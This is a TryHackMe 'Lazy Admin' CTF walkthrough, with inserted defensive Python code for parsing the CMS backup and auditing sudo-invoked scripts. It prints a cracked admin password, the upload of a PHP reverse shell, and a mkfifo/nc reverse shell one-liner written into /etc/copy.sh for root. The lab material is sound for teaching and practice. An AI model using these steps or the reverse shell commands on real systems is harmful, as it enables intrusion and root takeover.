Lazy Admin
In this post, we will look into the room “Lazy Admin” from TryHackMe, which can be found on https://tryhackme.com
user flag 1
echo "<machine-ip> lazyadmin.com" >> /etc/hosts
Enumeration
nmap -sC -sV -oN nmap.txt lazyadmin.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 04:08 EDT
Nmap scan report for lazyadmin.com (10.10.240.121)
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.82 seconds
firefox lazyadmin.com
We will run gobuster to enumerate the website.
gobuster dir -u http://lazyadmin.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35
/content
firefox lazyadmin.com/content
Welcome to SweetRice - Thank your for install SweetRice as your website management system.
This site is building now , please come late.
If you are the webmaster,please go to Dashboard -> General -> Website setting
and uncheck the checkbox "Site close" to open your website.
More help at Tip for Basic CMS SweetRice installed
gobuster dir -u http://lazyadmin.com/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35
/inc
firefox lazyadmin.com/content/inc
We will see a folder named mysql_backup. Navigate to mysql_backup and download the file, then open it in any text editor (I use vim).
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\
"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:
\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"
<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p>
manager : 42f749ade7f9e195bf475f37a44cafcb(MD5)
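The `global_setting` blob above is PHP `serialize()` output wrapped in two escaping layers: the dump stores each SQL statement as a PHP single-quoted string, and the value inside it is a MySQL string literal. As an added example, not from the original write-up and not SweetRice's own code, here is a small parser that unwraps one line of such a backup, decodes the settings array, and flags the password field when it is a bare 32-hex digest (an unsalted MD5-style hash, which a salted and slow scheme such as PHP's `password_hash()` output would avoid). The backup line below is constructed for this example; it mirrors the page's values but is not the actual file.

```python
import re

# Constructed sample: one line shaped like the mysql_backup dump shown above
# (a PHP array literal whose elements are SQL statements). Not the real file.
RAW_BACKUP_LINE = (
    r"""14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'"""
    r"""a:3:{s:5:\\"admin\\";s:7:\\"manager\\";"""
    r"""s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";"""
    r"""s:5:\\"close\\";i:1;}\')',"""
)


def unwrap_backup_blob(raw: str) -> str:
    r"""Strip the two escaping layers around the serialized value.

    Outer layer: PHP single-quoted string, where only \' and \\ are escapes.
    Inner layer: MySQL string literal, where a backslash escapes the next
    character (simplified: \n, \0 and similar are not translated).
    """
    php_level = re.sub(r"\\(['\\])", r"\1", raw)
    return re.sub(r"\\(.)", r"\1", php_level)


def php_unserialize(data):
    """Decode PHP serialize() output (N, i, b, d, s, a) into Python values."""
    if isinstance(data, str):
        data = data.encode("utf-8")          # s:<len> counts bytes, not characters
    value, end = _parse(data, 0)
    if end != len(data):
        raise ValueError(f"trailing data at offset {end}")
    return value


def _parse(buf: bytes, i: int):
    kind = buf[i:i + 1]
    if kind == b"N":                         # N;
        return None, i + 2
    if kind in (b"i", b"b", b"d"):           # i:123;  b:1;  d:1.5;
        end = buf.index(b";", i)
        raw = buf[i + 2:end].decode()
        if kind == b"i":
            return int(raw), end + 1
        if kind == b"b":
            return raw == "1", end + 1
        return float(raw), end + 1
    if kind == b"s":                         # s:<len>:"<bytes>";
        colon = buf.index(b":", i + 2)
        length = int(buf[i + 2:colon])
        start = colon + 2                    # skip :"
        stop = start + length
        if buf[stop:stop + 2] != b'";':
            raise ValueError(f"bad string terminator at offset {stop}")
        return buf[start:stop].decode("utf-8"), stop + 2
    if kind == b"a":                         # a:<n>:{key;value;...}
        colon = buf.index(b":", i + 2)
        count = int(buf[i + 2:colon])
        j = colon + 2                        # skip :{
        result = {}
        for _ in range(count):
            key, j = _parse(buf, j)
            val, j = _parse(buf, j)
            result[key] = val
        if buf[j:j + 1] != b"}":
            raise ValueError(f"expected '}}' at offset {j}")
        return result, j + 1
    raise ValueError(f"unsupported type {kind!r} at offset {i}")


def extract_global_setting(line: str) -> dict:
    """Pull the global_setting row out of one dump line and decode it."""
    m = re.search(r"\\'global_setting\\',\\'(.*)\\'\)", line)
    if not m:
        raise ValueError("no global_setting row on this line")
    return php_unserialize(unwrap_backup_blob(m.group(1)))


def audit_settings(settings: dict) -> list:
    """Report weak credential storage in a decoded settings array."""
    findings = []
    if re.fullmatch(r"[0-9a-f]{32}", settings.get("passwd", "")):
        findings.append("passwd is a bare 32-hex digest (unsalted MD5-style); "
                        "a salted, slow hash would not be this exposed in a leaked backup")
    return findings


if __name__ == "__main__":
    cfg = extract_global_setting(RAW_BACKUP_LINE)
    print(cfg)
    for f in audit_settings(cfg):
        print("finding:", f)
```

The parser follows the serialize() grammar directly (string lengths are byte counts, so it works on bytes), which is why it reads the blob without the manual eyeballing the backup otherwise requires; the audit function is the check a reviewer of this CMS would want, since storing an admin password as an unsalted MD5 digest in a backup that sits under the web root is the root cause here.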
echo 42f749ade7f9e195bf475f37a44cafcb > hash.txt
john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
manager : Password123
firefox lazyadmin.com/content/as
Enter the credentials to log in, then navigate to Media Center and upload the reverse shell. If you don't have one, you can download it from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php. After changing the IP address and renaming it to revshell.php5, we see the file is uploaded. Open a terminal and execute this:
nc -lnvp 4444
Now click on the uploaded file and we get a shell.
python -c 'import pty; pty.spawn("/bin/bash")'
Enter these commands to spawn a TTY shell, then move to /home/itguy.
We get the user flag.
root flag
Privilege Escalation
rice : randompass
#!/usr/bin/perl
system("sh", "/etc/copy.sh");
This script executes another script, /etc/copy.sh:
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Luckily we can write to copy.sh, so all we need to do is insert a reverse shell:
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 5554 >/tmp/f" > /etc/copy.sh
open a new terminal and run this command
nc -lnvp 5554
Then go to the victim shell and execute this command:
sudo /usr/bin/perl /home/itguy/backup.pl
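The root step works because sudo protects backup.pl itself, but backup.pl hands control to /etc/copy.sh, a file a low-privileged user could edit. As an added example, not part of the write-up, here is a small audit a defender can run against any script allowed through sudo: it extracts the absolute paths the script invokes and reports each one that is missing, a symlink, owned by an untrusted uid, or group/world-writable, then shows that tightening the mode clears the finding. The backup.pl/copy.sh fixture it builds in a temporary directory is constructed for the demo (its copy.sh only echoes), the path-extraction regex is a heuristic rather than a Perl parser, and `trusted_uids` is this example's own parameter.

```python
import os
import re
import stat
import tempfile

# Heuristic: absolute paths passed as double-quoted arguments, e.g. the
# "/etc/copy.sh" in  system("sh", "/etc/copy.sh");  (not a real Perl parser).
_PATH_ARG = re.compile(r'"(/[^"]+)"')


def invoked_paths(script_text):
    """Absolute paths a script hands to another interpreter or command."""
    return _PATH_ARG.findall(script_text)


def writability_problem(path, trusted_uids):
    """Why an untrusted user could change what runs from `path`, or None."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return "is a symlink, so whoever controls the link chooses the target"
    if st.st_uid not in trusted_uids:
        return f"owned by uid {st.st_uid}, which is not a trusted uid"
    if st.st_mode & stat.S_IWOTH:
        return "world-writable"
    if st.st_mode & stat.S_IWGRP:
        return "group-writable"
    return None


def audit_sudo_script(script_path, trusted_uids=(0,)):
    """Check a sudo-permitted script and every file it invokes.

    Returns [(path, reason), ...]. trusted_uids defaults to root only; the
    demo passes the current uid because its fixture files are not root-owned.
    """
    with open(script_path) as fh:
        text = fh.read()
    findings = []
    for path in [script_path] + invoked_paths(text):
        if not os.path.lexists(path):
            findings.append((path, "does not exist, so whoever can create it decides what root runs"))
            continue
        reason = writability_problem(path, trusted_uids)
        if reason:
            findings.append((path, reason))
    return findings


def run_demo():
    """Build a backup.pl -> copy.sh fixture like the one on this box (constructed,
    harmless), audit it, apply the remediation (no write bit for group/other),
    and audit again. Returns basenames so the result is path-independent."""
    with tempfile.TemporaryDirectory() as tmp:
        copy_sh = os.path.join(tmp, "copy.sh")
        with open(copy_sh, "w") as fh:
            fh.write("#!/bin/sh\necho backup placeholder\n")
        os.chmod(copy_sh, 0o777)                 # the misconfiguration
        backup_pl = os.path.join(tmp, "backup.pl")
        with open(backup_pl, "w") as fh:
            fh.write(f'#!/usr/bin/perl\nsystem("sh", "{copy_sh}");\n')
        os.chmod(backup_pl, 0o755)
        me = (os.getuid(),)
        before = audit_sudo_script(backup_pl, trusted_uids=me)
        os.chmod(copy_sh, 0o755)                 # remediation
        after = audit_sudo_script(backup_pl, trusted_uids=me)
        short = lambda fs: [(os.path.basename(p), r) for p, r in fs]
        return {"before": short(before), "after": short(after)}


if __name__ == "__main__":
    for phase, findings in run_demo().items():
        print(phase, findings or "clean")
```

In real use, call `audit_sudo_script("/home/itguy/backup.pl")` with the default `trusted_uids` so that a non-root owner is also reported, since the owner can chmod the file regardless of its current mode. Checking each ancestor directory of every target for write access is the natural extension; a writable directory lets the file be replaced even when the file itself is 0644 root-owned.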